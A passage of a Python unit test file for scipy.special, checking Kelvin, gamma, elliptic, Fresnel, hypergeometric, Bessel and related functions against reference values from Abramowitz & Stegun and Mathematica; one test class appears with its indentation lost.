        # TODO: besselpoly is not covered yet (see "### test_besselpoly" in
        # the header notes at the top of this file).
        pass
class TestKelvin(TestCase):
    """Kelvin functions ber/bei/ker/kei, their derivatives and zeros.

    Reference values for the zeros come from table 9.9 of Abramowitz &
    Stegun (pg. 381); single-point values are regression references.
    """
    def test_bei(self):
        mbei = special.bei(2)
        assert_almost_equal(mbei, 0.9722916273066613,5)#this may not be exact
    def test_beip(self):
        mbeip = special.beip(2)
        assert_almost_equal(mbeip,0.91701361338403631,5)#this may not be exact
    def test_ber(self):
        mber = special.ber(2)
        assert_almost_equal(mber,0.75173418271380821,5)#this may not be exact
    def test_berp(self):
        mberp = special.berp(2)
        assert_almost_equal(mberp,-0.49306712470943909,5)#this may not be exact
    def test_bei_zeros(self):
        # Fixed: this previously called special.bi_zeros (Airy Bi zeros,
        # already covered by the Airy tests) instead of the Kelvin bei
        # zeros.  Reference values are the first five zeros of bei, the
        # same beiz values asserted in test_kelvin_zeros.
        bei = special.bei_zeros(5)
        assert_array_almost_equal(bei,array([ 5.02622,
                                              9.45541,
                                              13.89349,
                                              18.33398,
                                              22.77544]),4)
    def test_beip_zeros(self):
        bip = special.beip_zeros(5)
        assert_array_almost_equal(bip,array([ 3.772673304934953,
                                               8.280987849760042,
                                               12.742147523633703,
                                               17.193431752512542,
                                               21.641143941167325]),4)
    def test_ber_zeros(self):
        ber = special.ber_zeros(5)
        assert_array_almost_equal(ber,array([2.84892,
                                             7.23883,
                                             11.67396,
                                             16.11356,
                                             20.55463]),4)
    def test_berp_zeros(self):
        brp = special.berp_zeros(5)
        assert_array_almost_equal(brp,array([6.03871,
                                             10.51364,
                                             14.96844,
                                             19.41758,
                                             23.86430]),4)
    def test_kelvin(self):
        # kelvin() bundles all four complex combinations; check each
        # against the individual real/imaginary components.
        mkelv = special.kelvin(2)
        assert_array_almost_equal(mkelv,(special.ber(2) + special.bei(2)*1j,
                                         special.ker(2) + special.kei(2)*1j,
                                         special.berp(2) + special.beip(2)*1j,
                                         special.kerp(2) + special.keip(2)*1j),8)
    def test_kei(self):
        mkei = special.kei(2)
        assert_almost_equal(mkei,-0.20240006776470432,5)
    def test_keip(self):
        mkeip = special.keip(2)
        assert_almost_equal(mkeip,0.21980790991960536,5)
    def test_ker(self):
        mker = special.ker(2)
        assert_almost_equal(mker,-0.041664513991509472,5)
    def test_kerp(self):
        mkerp = special.kerp(2)
        assert_almost_equal(mkerp,-0.10660096588105264,5)
    def test_kei_zeros(self):
        kei = special.kei_zeros(5)
        assert_array_almost_equal(kei,array([ 3.91467,
                                              8.34422,
                                              12.78256,
                                              17.22314,
                                              21.66464]),4)
    def test_keip_zeros(self):
        keip = special.keip_zeros(5)
        assert_array_almost_equal(keip,array([ 4.93181,
                                               9.40405,
                                               13.85827,
                                               18.30717,
                                               22.75379]),4)
    # numbers come from 9.9 of A&S pg. 381
    def test_kelvin_zeros(self):
        tmp = special.kelvin_zeros(5)
        berz,beiz,kerz,keiz,berpz,beipz,kerpz,keipz = tmp
        assert_array_almost_equal(berz,array([ 2.84892,
                                               7.23883,
                                               11.67396,
                                               16.11356,
                                               20.55463]),4)
        assert_array_almost_equal(beiz,array([ 5.02622,
                                               9.45541,
                                               13.89349,
                                               18.33398,
                                               22.77544]),4)
        assert_array_almost_equal(kerz,array([ 1.71854,
                                               6.12728,
                                               10.56294,
                                               15.00269,
                                               19.44382]),4)
        assert_array_almost_equal(keiz,array([ 3.91467,
                                               8.34422,
                                               12.78256,
                                               17.22314,
                                               21.66464]),4)
        assert_array_almost_equal(berpz,array([ 6.03871,
                                                10.51364,
                                                14.96844,
                                                19.41758,
                                                23.86430]),4)
        assert_array_almost_equal(beipz,array([ 3.77267,
                 # table from 1927 had 3.77320
                 #  but this is more accurate
                                                8.28099,
                                                12.74215,
                                                17.19343,
                                                21.64114]),4)
        assert_array_almost_equal(kerpz,array([ 2.66584,
                                                7.17212,
                                                11.63218,
                                                16.08312,
                                                20.53068]),4)
        assert_array_almost_equal(keipz,array([ 4.93181,
                                                9.40405,
                                                13.85827,
                                                18.30717,
                                                22.75379]),4)
    def test_ker_zeros(self):
        ker = special.ker_zeros(5)
        assert_array_almost_equal(ker,array([ 1.71854,
                                              6.12728,
                                              10.56294,
                                              15.00269,
                                              19.44381]),4)
    def test_kerp_zeros(self):
        kerp = special.kerp_zeros(5)
        assert_array_almost_equal(kerp,array([ 2.66584,
                                               7.17212,
                                               11.63218,
                                               16.08312,
                                               20.53068]),4)
class TestBernoulli(TestCase):
    def test_bernoulli(self):
        # First six Bernoulli numbers B_0 .. B_5.
        expected = array([1.0000, -0.5000, 0.1667, 0.0000, -0.0333, 0.0000])
        assert_array_almost_equal(special.bernoulli(5), expected, 4)
class TestBeta(TestCase):
    """Beta function and its log/incomplete/inverse relatives."""

    def test_beta(self):
        # B(a, b) = Gamma(a) * Gamma(b) / Gamma(a + b)
        via_gamma = (special.gamma(2) * special.gamma(4)) / special.gamma(6)
        assert_almost_equal(special.beta(2, 4), via_gamma, 8)

    def test_betaln(self):
        expected = log(abs(special.beta(2, 4)))
        assert_almost_equal(special.betaln(2, 4), expected, 8)

    def test_betainc(self):
        # I_x(1, 1) is the identity, so the value at 0.2 is 0.2.
        assert_almost_equal(special.betainc(1, 1, .2), 0.2, 8)

    def test_betaincinv(self):
        # Round-trip through the inverse incomplete beta.
        y = special.betaincinv(2, 4, .5)
        assert_almost_equal(special.betainc(2, 4, y), .5, 5)
class TestTrigonometric(TestCase):
    """Degree-argument trig helpers plus cbrt, cosm1, and sinc."""

    def test_cbrt(self):
        assert_approx_equal(special.cbrt(27), 27 ** (1.0 / 3.0))

    def test_cbrtmore(self):
        assert_almost_equal(special.cbrt(27.9), 27.9 ** (1.0 / 3.0), 8)

    def test_cosdg(self):
        assert_almost_equal(special.cosdg(90), cos(pi / 2.0), 8)

    def test_cosdgmore(self):
        assert_almost_equal(special.cosdg(30), cos(pi / 6.0), 8)

    def test_cosm1(self):
        args = (0, .3, pi / 10)
        computed = tuple(special.cosm1(a) for a in args)
        expected = tuple(cos(a) - 1 for a in args)
        assert_array_almost_equal(computed, expected, 8)

    def test_cotdg(self):
        assert_almost_equal(special.cotdg(30), tan(pi / 6.0) ** (-1), 8)

    def test_cotdgmore(self):
        assert_almost_equal(special.cotdg(45), tan(pi / 4.0) ** (-1), 8)

    def test_specialpoints(self):
        # cotdg must be exact (14 places) at multiples of 45 degrees.
        for deg, expected in [(45, 1.0), (-45, -1.0), (90, 0.0), (-90, 0.0),
                              (135, -1.0), (-135, 1.0), (225, 1.0),
                              (-225, -1.0), (270, 0.0), (-270, 0.0),
                              (315, -1.0), (-315, 1.0), (765, 1.0)]:
            assert_almost_equal(special.cotdg(deg), expected, 14)

    def test_sinc(self):
        grid = arange(-2, 2, .1)
        computed = special.sinc(grid)
        expected = sin(pi * grid) / (pi * grid)
        expected[20] = 1.0  # grid[20] == 0; patch the 0/0 limit by hand
        assert_array_almost_equal(computed, expected, 4)

    def test_0(self):
        x = 0.0
        assert_equal(special.sinc(x), 1.0)

    def test_sindg(self):
        assert_equal(special.sindg(90), 1.0)

    def test_sindgmore(self):
        assert_almost_equal(special.sindg(30), sin(pi / 6.0), 8)
        assert_almost_equal(special.sindg(45), sin(pi / 4.0), 8)
class TestTandg(TestCase):
    """Tangent with the argument in degrees."""

    def test_tandg(self):
        assert_almost_equal(special.tandg(30), tan(pi / 6.0), 8)

    def test_tandgmore(self):
        assert_almost_equal(special.tandg(45), tan(pi / 4.0), 8)
        assert_almost_equal(special.tandg(60), tan(pi / 3.0), 8)

    def test_specialpoints(self):
        # tandg must be exact (14 places) at multiples of 45 degrees.
        for deg, expected in [(0, 0.0), (45, 1.0), (-45, -1.0),
                              (135, -1.0), (-135, 1.0), (180, 0.0),
                              (-180, 0.0), (225, 1.0), (-225, -1.0),
                              (315, -1.0), (-315, 1.0)]:
            assert_almost_equal(special.tandg(deg), expected, 14)
class TestEllip(TestCase):
    """Elliptic integrals and the Jacobi elliptic functions."""

    def test_ellipj_nan(self):
        """Regression test for #912: a nan modulus must not crash."""
        special.ellipj(0.5, np.nan)

    def test_ellipj(self):
        # At m = 0 the Jacobi functions reduce to circular trig.
        expected = [sin(0.2), cos(0.2), 1.0, 0.20]
        assert_array_almost_equal(special.ellipj(0.2, 0), expected, 13)

    def test_ellipk(self):
        assert_almost_equal(special.ellipk(.2), 1.659623598610528, 11)

    def test_ellipkinc(self):
        # The complete integral is the incomplete one at phi = pi/2.
        assert_almost_equal(special.ellipkinc(pi / 2, .2),
                            special.ellipk(0.2), 15)
        # From pg. 614 of A & S
        alpha = 20 * pi / 180
        phi = 45 * pi / 180
        assert_almost_equal(special.ellipkinc(phi, sin(alpha) ** 2),
                            0.79398143, 8)

    def test_ellipe(self):
        assert_almost_equal(special.ellipe(.2), 1.4890350580958529, 8)

    def test_ellipeinc(self):
        assert_almost_equal(special.ellipeinc(pi / 2, .2),
                            special.ellipe(0.2), 14)
        # pg 617 of A & S
        alpha, phi = 52 * pi / 180, 35 * pi / 180
        assert_almost_equal(special.ellipeinc(phi, sin(alpha) ** 2),
                            0.58823065, 8)
class TestErf(TestCase):
def test_erf(self):
er = special.erf(.25)
assert_almost_equal(er,0.2763263902,8)
def test_erf_zeros(self):
erz = special.erf_zeros(5)
erzr= array([1.45061616+1.88094300j,
2.24465928+2.61657514j,
2.83974105+3.17562810j,
3.33546074+3.64617438j,
3.76900557+4.06069723j])
assert_array_almost_equal(erz,erzr,4)
def test_erfcinv(self):
i = special.erfcinv(1)
assert_equal(i,0)
def test_erfinv(self):
i = special.erfinv(0)
assert_equal(i,0)
def test_errprint(self):
a = special.errprint()
b = 1-a #a is the state 1-a inverts state
c = special.errprint(b) #returns last state 'a'
assert_equal(a,c)
d = special.errprint(a) #returns to original state
assert_equal(d,b) #makes sure state was returned
#assert_equal(d,1-a)
class TestEuler(TestCase):
    """Euler numbers E_0, E_2, ... against MathWorld reference values."""
    def test_euler(self):
        eu0 = special.euler(0)
        eu1 = special.euler(1)
        eu2 = special.euler(2)   # just checking segfaults
        assert_almost_equal(eu0[0],1,8)
        assert_almost_equal(eu2[2],-1,8)
        eu24 = special.euler(24)
        # |E_2k| for k = 0..12 from MathWorld.  Plain int literals:
        # Python promotes to arbitrary precision automatically, so the
        # Python-2-only lowercase 'l' long suffix (a syntax error on
        # Python 3) has been dropped.
        mathworld = [1,1,5,61,1385,50521,2702765,199360981,
                     19391512145,2404879675441,
                     370371188237525,69348874393137901,
                     15514534163557086905]
        correct = zeros((25,),'d')
        for k in range(0,13):
            # Signs alternate: E_2k is negative for odd k.
            if (k % 2):
                correct[2*k] = -float(mathworld[k])
            else:
                correct[2*k] = float(mathworld[k])
        # Division by the zero entries of `correct` is expected; silence
        # the warnings and rely on nan_to_num to clean the result.
        olderr = np.seterr(all='ignore')
        try:
            err = nan_to_num((eu24-correct)/correct)
            errmax = max(err)
        finally:
            np.seterr(**olderr)
        assert_almost_equal(errmax, 0.0, 14)
class TestExp(TestCase):
    """exp2, exp10 and expm1 against the obvious power/exp formulas."""

    def test_exp2(self):
        assert_equal(special.exp2(2), 2 ** 2)

    def test_exp2more(self):
        assert_almost_equal(special.exp2(2.5), 2 ** (2.5), 8)

    def test_exp10(self):
        assert_approx_equal(special.exp10(2), 10 ** 2)

    def test_exp10more(self):
        assert_almost_equal(special.exp10(2.5), 10 ** (2.5), 8)

    def test_expm1(self):
        for arg in (2, 3, 4):
            assert_almost_equal(special.expm1(arg), exp(arg) - 1, 8)

    def test_expm1more(self):
        for arg in (2, 2.1, 2.2):
            assert_almost_equal(special.expm1(arg), exp(arg) - 1, 8)
class TestFresnel(TestCase):
    """Fresnel integrals S(z), C(z) and their complex zeros."""

    def test_fresnel(self):
        # values from pg 329 Table 7.11 of A & S,
        # slightly corrected in 4th decimal place
        expected = array([0.064732432859999287, 0.49234422587144644])
        assert_array_almost_equal(array(special.fresnel(.5)), expected, 8)

    def test_fresnel_zeros(self):
        szo, czo = special.fresnel_zeros(5)
        assert_array_almost_equal(szo,
                                  array([2.0093 + 0.2885j,
                                         2.8335 + 0.2443j,
                                         3.4675 + 0.2185j,
                                         4.0026 + 0.2009j,
                                         4.4742 + 0.1877j]), 3)
        assert_array_almost_equal(czo,
                                  array([1.7437 + 0.3057j,
                                         2.6515 + 0.2529j,
                                         3.3204 + 0.2240j,
                                         3.8757 + 0.2047j,
                                         4.3611 + 0.1907j]), 3)
        # S must vanish at the S-zeros and C at the C-zeros.
        assert_array_almost_equal(special.fresnel(szo)[0], 0, 14)
        assert_array_almost_equal(special.fresnel(czo)[1], 0, 14)

    def test_fresnelc_zeros(self):
        szo, czo = special.fresnel_zeros(6)
        assert_array_almost_equal(special.fresnelc_zeros(6), czo, 12)

    def test_fresnels_zeros(self):
        szo, czo = special.fresnel_zeros(5)
        assert_array_almost_equal(special.fresnels_zeros(5), szo, 12)
class TestGamma(TestCase):
    """Gamma function and the (inverse) incomplete gamma family."""

    def test_gamma(self):
        assert_equal(special.gamma(5), 24.0)

    def test_gammaln(self):
        assert_almost_equal(special.gammaln(3), log(special.gamma(3)), 8)

    def test_gammainc(self):
        assert_almost_equal(special.gammainc(.5, .5), .7, 1)

    def test_gammaincc(self):
        # Complement identity: Q(a, x) = 1 - P(a, x).
        assert_almost_equal(special.gammaincc(.5, .5),
                            1 - special.gammainc(.5, .5), 8)

    def test_gammainccinv(self):
        # At p = 0.5 the two inverses coincide.
        assert_almost_equal(special.gammainccinv(.5, .5),
                            special.gammaincinv(.5, .5), 8)

    @with_special_errors
    def test_gammaincinv(self):
        # Coarse round trip through the inverse ...
        y = special.gammaincinv(.4, .4)
        assert_almost_equal(special.gammainc(.4, y), 0.4, 1)
        # ... and round trips through extremely small tail values.
        y = special.gammainc(10, 0.05)
        x = special.gammaincinv(10, 2.5715803516000736e-20)
        assert_almost_equal(0.05, x, decimal=10)
        assert_almost_equal(y, 2.5715803516000736e-20, decimal=10)
        x = special.gammaincinv(50, 8.20754777388471303050299243573393e-18)
        assert_almost_equal(11.0, x, decimal=10)

    @with_special_errors
    def test_975(self):
        # Regression test for ticket #975 -- switch point in algorithm
        # check that things work OK at the point, immediately next floats
        # around it, and a bit further away
        pts = [0.25,
               np.nextafter(0.25, 0), 0.25 - 1e-12,
               np.nextafter(0.25, 1), 0.25 + 1e-12]
        for xp in pts:
            roundtrip = special.gammainc(0.4, special.gammaincinv(.4, xp))
            assert_tol_equal(roundtrip, xp, rtol=1e-12)

    def test_rgamma(self):
        # rgamma is the reciprocal gamma function.
        assert_almost_equal(special.rgamma(8), 1 / special.gamma(8), 8)
class TestHankel(TestCase):
    """Hankel functions H1/H2 and their exponentially scaled forms."""

    def test_negv1(self):
        # H1_{-n} = (-1)^n H1_n; for n = 3 that is a sign flip.
        assert_almost_equal(special.hankel1(-3, 2),
                            -special.hankel1(3, 2), 14)

    def test_hankel1(self):
        # H1 = J + iY
        expected = special.jv(1, .1) + special.yv(1, .1) * 1j
        assert_almost_equal(special.hankel1(1, .1), expected, 8)

    def test_negv1e(self):
        assert_almost_equal(special.hankel1e(-3, 2),
                            -special.hankel1e(3, 2), 14)

    def test_hankel1e(self):
        # Scaled form: hankel1e(v, z) = hankel1(v, z) * exp(-iz).
        expected = special.hankel1(1, .1) * exp(-.1j)
        assert_almost_equal(special.hankel1e(1, .1), expected, 8)

    def test_negv2(self):
        assert_almost_equal(special.hankel2(-3, 2),
                            -special.hankel2(3, 2), 14)

    def test_hankel2(self):
        # H2 = J - iY
        expected = special.jv(1, .1) - special.yv(1, .1) * 1j
        assert_almost_equal(special.hankel2(1, .1), expected, 8)

    def test_neg2e(self):
        assert_almost_equal(special.hankel2e(-3, 2),
                            -special.hankel2e(3, 2), 14)

    def test_hankl2e(self):
        # Self-consistency only: compares hankel2e with itself.
        assert_almost_equal(special.hankel2e(1, .1),
                            special.hankel2e(1, .1), 8)
class TestHyper(TestCase):
    """Hypergeometric functions and Hankel-derivative helpers."""

    def test_h1vp(self):
        # H1' = J' + iY'
        expected = special.jvp(1, .1) + special.yvp(1, .1) * 1j
        assert_almost_equal(special.h1vp(1, .1), expected, 8)

    def test_h2vp(self):
        # H2' = J' - iY'
        expected = special.jvp(1, .1) - special.yvp(1, .1) * 1j
        assert_almost_equal(special.h2vp(1, .1), expected, 8)

    def test_hyp0f1(self):
        pass

    def test_hyp1f1(self):
        assert_almost_equal(special.hyp1f1(.1, .1, .3),
                            1.3498588075760032, 7)

        # test contributed by Moritz Deger (2008-05-29)
        # http://projects.scipy.org/scipy/scipy/ticket/659
        # reference data obtained from mathematica [ a, b, x, m(a,b,x)]:
        # produced with test_hyp1f1.nb
        ref_data = array([
            [-8.38132975e+00, -1.28436461e+01, -2.91081397e+01, 1.04178330e+04],
            [2.91076882e+00, -6.35234333e+00, -1.27083993e+01, 6.68132725e+00],
            [-1.42938258e+01, 1.80869131e-01, 1.90038728e+01, 1.01385897e+05],
            [5.84069088e+00, 1.33187908e+01, 2.91290106e+01, 1.59469411e+08],
            [-2.70433202e+01, -1.16274873e+01, -2.89582384e+01, 1.39900152e+24],
            [4.26344966e+00, -2.32701773e+01, 1.91635759e+01, 6.13816915e+21],
            [1.20514340e+01, -3.40260240e+00, 7.26832235e+00, 1.17696112e+13],
            [2.77372955e+01, -1.99424687e+00, 3.61332246e+00, 3.07419615e+13],
            [1.50310939e+01, -2.91198675e+01, -1.53581080e+01, -3.79166033e+02],
            [1.43995827e+01, 9.84311196e+00, 1.93204553e+01, 2.55836264e+10],
            [-4.08759686e+00, 1.34437025e+01, -1.42072843e+01, 1.70778449e+01],
            [8.05595738e+00, -1.31019838e+01, 1.52180721e+01, 3.06233294e+21],
            [1.81815804e+01, -1.42908793e+01, 9.57868793e+00, -2.84771348e+20],
            [-2.49671396e+01, 1.25082843e+01, -1.71562286e+01, 2.36290426e+07],
            [2.67277673e+01, 1.70315414e+01, 6.12701450e+00, 7.77917232e+03],
            [2.49565476e+01, 2.91694684e+01, 6.29622660e+00, 2.35300027e+02],
            [6.11924542e+00, -1.59943768e+00, 9.57009289e+00, 1.32906326e+11],
            [-1.47863653e+01, 2.41691301e+01, -1.89981821e+01, 2.73064953e+03],
            [2.24070483e+01, -2.93647433e+00, 8.19281432e+00, -6.42000372e+17],
            [8.04042600e-01, 1.82710085e+01, -1.97814534e+01, 5.48372441e-01],
            [1.39590390e+01, 1.97318686e+01, 2.37606635e+00, 5.51923681e+00],
            [-4.66640483e+00, -2.00237930e+01, 7.40365095e+00, 4.50310752e+00],
            [2.76821999e+01, -6.36563968e+00, 1.11533984e+01, -9.28725179e+23],
            [-2.56764457e+01, 1.24544906e+00, 1.06407572e+01, 1.25922076e+01],
            [3.20447808e+00, 1.30874383e+01, 2.26098014e+01, 2.03202059e+04],
            [-1.24809647e+01, 4.15137113e+00, -2.92265700e+01, 2.39621411e+08],
            [2.14778108e+01, -2.35162960e+00, -1.13758664e+01, 4.46882152e-01],
            [-9.85469168e+00, -3.28157680e+00, 1.67447548e+01, -1.07342390e+07],
            [1.08122310e+01, -2.47353236e+01, -1.15622349e+01, -2.91733796e+03],
            [-2.67933347e+01, -3.39100709e+00, 2.56006986e+01, -5.29275382e+09],
            [-8.60066776e+00, -8.02200924e+00, 1.07231926e+01, 1.33548320e+06],
            [-1.01724238e-01, -1.18479709e+01, -2.55407104e+01, 1.55436570e+00],
            [-3.93356771e+00, 2.11106818e+01, -2.57598485e+01, 2.13467840e+01],
            [3.74750503e+00, 1.55687633e+01, -2.92841720e+01, 1.43873509e-02],
            [6.99726781e+00, 2.69855571e+01, -1.63707771e+01, 3.08098673e-02],
            [-2.31996011e+01, 3.47631054e+00, 9.75119815e-01, 1.79971073e-02],
            [2.38951044e+01, -2.91460190e+01, -2.50774708e+00, 9.56934814e+00],
            [1.52730825e+01, 5.77062507e+00, 1.21922003e+01, 1.32345307e+09],
            [1.74673917e+01, 1.89723426e+01, 4.94903250e+00, 9.90859484e+01],
            [1.88971241e+01, 2.86255413e+01, 5.52360109e-01, 1.44165360e+00],
            [1.02002319e+01, -1.66855152e+01, -2.55426235e+01, 6.56481554e+02],
            [-1.79474153e+01, 1.22210200e+01, -1.84058212e+01, 8.24041812e+05],
            [-1.36147103e+01, 1.32365492e+00, -7.22375200e+00, 9.92446491e+05],
            [7.57407832e+00, 2.59738234e+01, -1.34139168e+01, 3.64037761e-02],
            [2.21110169e+00, 1.28012666e+01, 1.62529102e+01, 1.33433085e+02],
            [-2.64297569e+01, -1.63176658e+01, -1.11642006e+01, -2.44797251e+13],
            [-2.46622944e+01, -3.02147372e+00, 8.29159315e+00, -3.21799070e+05],
            [-1.37215095e+01, -1.96680183e+01, 2.91940118e+01, 3.21457520e+12],
            [-5.45566105e+00, 2.81292086e+01, 1.72548215e-01, 9.66973000e-01],
            [-1.55751298e+00, -8.65703373e+00, 2.68622026e+01, -3.17190834e+16],
            [2.45393609e+01, -2.70571903e+01, 1.96815505e+01, 1.80708004e+37],
            [5.77482829e+00, 1.53203143e+01, 2.50534322e+01, 1.14304242e+06],
            [-1.02626819e+01, 2.36887658e+01, -2.32152102e+01, 7.28965646e+02],
            [-1.30833446e+00, -1.28310210e+01, 1.87275544e+01, -9.33487904e+12],
            [5.83024676e+00, -1.49279672e+01, 2.44957538e+01, -7.61083070e+27],
            [-2.03130747e+01, 2.59641715e+01, -2.06174328e+01, 4.54744859e+04],
            [1.97684551e+01, -2.21410519e+01, -2.26728740e+01, 3.53113026e+06],
            [2.73673444e+01, 2.64491725e+01, 1.57599882e+01, 1.07385118e+07],
            [5.73287971e+00, 1.21111904e+01, 1.33080171e+01, 2.63220467e+03],
            [-2.82751072e+01, 2.08605881e+01, 9.09838900e+00, -6.60957033e-07],
            [1.87270691e+01, -1.74437016e+01, 1.52413599e+01, 6.59572851e+27],
            [6.60681457e+00, -2.69449855e+00, 9.78972047e+00, -2.38587870e+12],
            [1.20895561e+01, -2.51355765e+01, 2.30096101e+01, 7.58739886e+32],
            [-2.44682278e+01, 2.10673441e+01, -1.36705538e+01, 4.54213550e+04],
            [-4.50665152e+00, 3.72292059e+00, -4.83403707e+00, 2.68938214e+01],
            [-7.46540049e+00, -1.08422222e+01, -1.72203805e+01, -2.09402162e+02],
            [-2.00307551e+01, -7.50604431e+00, -2.78640020e+01, 4.15985444e+19],
            [1.99890876e+01, 2.20677419e+01, -2.51301778e+01, 1.23840297e-09],
            [2.03183823e+01, -7.66942559e+00, 2.10340070e+01, 1.46285095e+31],
            [-2.90315825e+00, -2.55785967e+01, -9.58779316e+00, 2.65714264e-01],
            [2.73960829e+01, -1.80097203e+01, -2.03070131e+00, 2.52908999e+02],
            [-2.11708058e+01, -2.70304032e+01, 2.48257944e+01, 3.09027527e+08],
            [2.21959758e+01, 4.00258675e+00, -1.62853977e+01, -9.16280090e-09],
            [1.61661840e+01, -2.26845150e+01, 2.17226940e+01, -8.24774394e+33],
            [-3.35030306e+00, 1.32670581e+00, 9.39711214e+00, -1.47303163e+01],
            [7.23720726e+00, -2.29763909e+01, 2.34709682e+01, -9.20711735e+29],
            [2.71013568e+01, 1.61951087e+01, -7.11388906e-01, 2.98750911e-01],
            [8.40057933e+00, -7.49665220e+00, 2.95587388e+01, 6.59465635e+29],
            [-1.51603423e+01, 1.94032322e+01, -7.60044357e+00, 1.05186941e+02],
            [-8.83788031e+00, -2.72018313e+01, 1.88269907e+00, 1.81687019e+00],
            [-1.87283712e+01, 5.87479570e+00, -1.91210203e+01, 2.52235612e+08],
            [-5.61338513e-01, 2.69490237e+01, 1.16660111e-01, 9.97567783e-01],
            [-5.44354025e+00, -1.26721408e+01, -4.66831036e+00, 1.06660735e-01],
            [-2.18846497e+00, 2.33299566e+01, 9.62564397e+00, 3.03842061e-01],
            [6.65661299e+00, -2.39048713e+01, 1.04191807e+01, 4.73700451e+13],
            [-2.57298921e+01, -2.60811296e+01, 2.74398110e+01, -5.32566307e+11],
            [-1.11431826e+01, -1.59420160e+01, -1.84880553e+01, -1.01514747e+02],
            [6.50301931e+00, 2.59859051e+01, -2.33270137e+01, 1.22760500e-02],
            [-1.94987891e+01, -2.62123262e+01, 3.90323225e+00, 1.71658894e+01],
            [7.26164601e+00, -1.41469402e+01, 2.81499763e+01, -2.50068329e+31],
            [-1.52424040e+01, 2.99719005e+01, -2.85753678e+01, 1.31906693e+04],
            [5.24149291e+00, -1.72807223e+01, 2.22129493e+01, 2.50748475e+25],
            [3.63207230e-01, -9.54120862e-02, -2.83874044e+01, 9.43854939e-01],
            [-2.11326457e+00, -1.25707023e+01, 1.17172130e+00, 1.20812698e+00],
            [2.48513582e+00, 1.03652647e+01, -1.84625148e+01, 6.47910997e-02],
            [2.65395942e+01, 2.74794672e+01, 1.29413428e+01, 2.89306132e+05],
            [-9.49445460e+00, 1.59930921e+01, -1.49596331e+01, 3.27574841e+02],
            [-5.89173945e+00, 9.96742426e+00, 2.60318889e+01, -3.15842908e-01],
            [-1.15387239e+01, -2.21433107e+01, -2.17686413e+01, 1.56724718e-01],
            [-5.30592244e+00, -2.42752190e+01, 1.29734035e+00, 1.31985534e+00]])
        # Relative accuracy of 1e-4 against the Mathematica values.
        for a, b, c, expected in ref_data:
            computed = special.hyp1f1(a, b, c)
            assert_(abs(expected - computed) / expected < 1e-4)

    def test_hyp1f2(self):
        pass

    def test_hyp2f0(self):
        pass

    def test_hyp2f1(self):
        # a collection of special cases taken from AMS 55
        values = [
            [0.5, 1, 1.5, 0.2**2, 0.5/0.2*log((1+0.2)/(1-0.2))],
            [0.5, 1, 1.5, -0.2**2, 1./0.2*arctan(0.2)],
            [1, 1, 2, 0.2, -1/0.2*log(1-0.2)],
            [3, 3.5, 1.5, 0.2**2,
             0.5/0.2/(-5)*((1+0.2)**(-5)-(1-0.2)**(-5))],
            [-3, 3, 0.5, sin(0.2)**2, cos(2*3*0.2)],
            [3, 4, 8, 1,
             special.gamma(8)*special.gamma(8-4-3)/special.gamma(8-3)/special.gamma(8-4)],
            [3, 2, 3-2+1, -1, 1./2**3*sqrt(pi) *
             special.gamma(1+3-2)/special.gamma(1+0.5*3-2)/special.gamma(0.5+0.5*3)],
            [5, 2, 5-2+1, -1, 1./2**5*sqrt(pi) *
             special.gamma(1+5-2)/special.gamma(1+0.5*5-2)/special.gamma(0.5+0.5*5)],
            [4, 0.5+4, 1.5-2*4, -1./3, (8./9)**(-2*4)*special.gamma(4./3) *
             special.gamma(1.5-2*4)/special.gamma(3./2)/special.gamma(4./3-2*4)],
            # and some others
            # ticket #424
            [1.5, -0.5, 1.0, -10.0, 4.1300097765277476484],
            # negative integer a or b, with c-a-b integer and x > 0.9
            [-2, 3, 1, 0.95, 0.715],
            [2, -3, 1, 0.95, -0.007],
            [-6, 3, 1, 0.95, 0.0000810625],
            [2, -5, 1, 0.95, -0.000029375],
            # huge negative integers
            (10, -900, 10.5, 0.99, 1.91853705796607664803709475658e-24),
            (10, -900, -10.5, 0.99, 3.54279200040355710199058559155e-18),
        ]
        for idx, (a, b, c, x, expected) in enumerate(values):
            computed = special.hyp2f1(a, b, c, x)
            assert_almost_equal(computed, expected, 8, err_msg='test #%d' % idx)

    def test_hyp3f0(self):
        pass

    def test_hyperu(self):
        assert_almost_equal(special.hyperu(1, 0.1, 100), 0.0098153, 7)
        a = asarray([0.3, 0.6, 1.2, -2.7])
        b = asarray([1.5, 3.2, -0.4, -3.2])
        z = 0.5
        # Kummer's relation expressing U in terms of M = 1F1.
        expected = (pi/sin(pi*b)) * (special.hyp1f1(a, b, z) /
                                     (special.gamma(1+a-b)*special.gamma(b)) -
                                     z**(1-b)*special.hyp1f1(1+a-b, 2-b, z) /
                                     (special.gamma(a)*special.gamma(2-b)))
        assert_array_almost_equal(special.hyperu(a, b, z), expected, 12)
class TestBessel(TestCase):
    """Bessel functions of the first/second kind, modified variants,
    their zeros, and cross-checks of the Cephes vs. AMOS backends."""

    def test_itj0y0(self):
        integrals = array(special.itj0y0(.2))
        assert_array_almost_equal(
            integrals, array([0.19933433254006822, -0.34570883800412566]), 8)

    def test_it2j0y0(self):
        integrals = array(special.it2j0y0(.2))
        assert_array_almost_equal(
            integrals, array([0.0049937546274601858, -0.43423067011231614]), 8)

    def test_negv_iv(self):
        # I_v is even in integer order.
        assert_equal(special.iv(3, 2), special.iv(-3, 2))

    def test_j0(self):
        # j0 is shorthand for jn(0, .).
        assert_almost_equal(special.j0(.1), special.jn(0, .1), 8)

    def test_j1(self):
        assert_almost_equal(special.j1(.1), special.jn(1, .1), 8)

    def test_jn(self):
        assert_almost_equal(special.jn(1, .2), 0.099500832639235995, 8)

    def test_negv_jv(self):
        # J_{-n} = (-1)^n J_n for integer order.
        assert_almost_equal(special.jv(-3, 2), -special.jv(3, 2), 14)

    def test_jv(self):
        cases = [[0, 0.1, 0.99750156206604002],
                 [2./3, 1e-8, 0.3239028506761532e-5],
                 [2./3, 1e-10, 0.1503423854873779e-6],
                 [3.1, 1e-10, 0.1711956265409013e-32],
                 [2./3, 4.0, -0.2325440850267039]]
        for idx, (order, arg, expected) in enumerate(cases):
            assert_almost_equal(special.jv(order, arg), expected, 8,
                                err_msg='test #%d' % idx)

    def test_negv_jve(self):
        assert_almost_equal(special.jve(-3, 2), -special.jve(3, 2), 14)

    def test_jve(self):
        assert_almost_equal(special.jve(1, .2), 0.099500832639235995, 8)
        z = .2 + 1j
        # jve scales by exp(-|Im z|).
        expected = special.jv(1, z) * exp(-abs(z.imag))
        assert_almost_equal(special.jve(1, .2 + 1j), expected, 8)

    def test_jn_zeros(self):
        jn0 = special.jn_zeros(0, 5)
        jn1 = special.jn_zeros(1, 5)
        assert_array_almost_equal(
            jn0, array([2.4048255577, 5.5200781103, 8.6537279129,
